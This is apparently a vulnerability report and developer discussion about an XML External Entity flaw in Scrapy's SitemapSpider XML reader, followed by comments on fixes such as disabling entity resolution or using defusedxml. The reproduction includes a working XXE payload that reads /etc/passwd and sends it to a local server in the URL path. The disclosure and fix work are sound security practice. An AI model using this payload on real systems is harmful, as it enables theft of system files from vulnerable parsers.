The XML reader, used by SitemapSpider to process XML sitemaps, is vulnerable to an XML External Entity (XXE) attack. The code to reproduce the bug is displayed below.
from scrapy.contrib.spiders import SitemapSpider class TestSpider(SitemapSpider): name = 'test' sitemap_urls = ['file:///tmp/malicious_sitemap.xml'] def parse(self, response): pass
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://127.0.0.1:8000/&xxe;</loc> </url> </urlset>
As result, the contents of /etc/passwd are sent to the server http://127.0.0.1:8000/ as part of the URL path.
@csalazar are you going to update the PR with fixes for the other Selector?
Do you mind adding a testcase specially for LxmlDocument class?
defusedxml looks good but it may require more work to integrate it, in the other hand resolve_entities=False looks quick enough to be merged soon.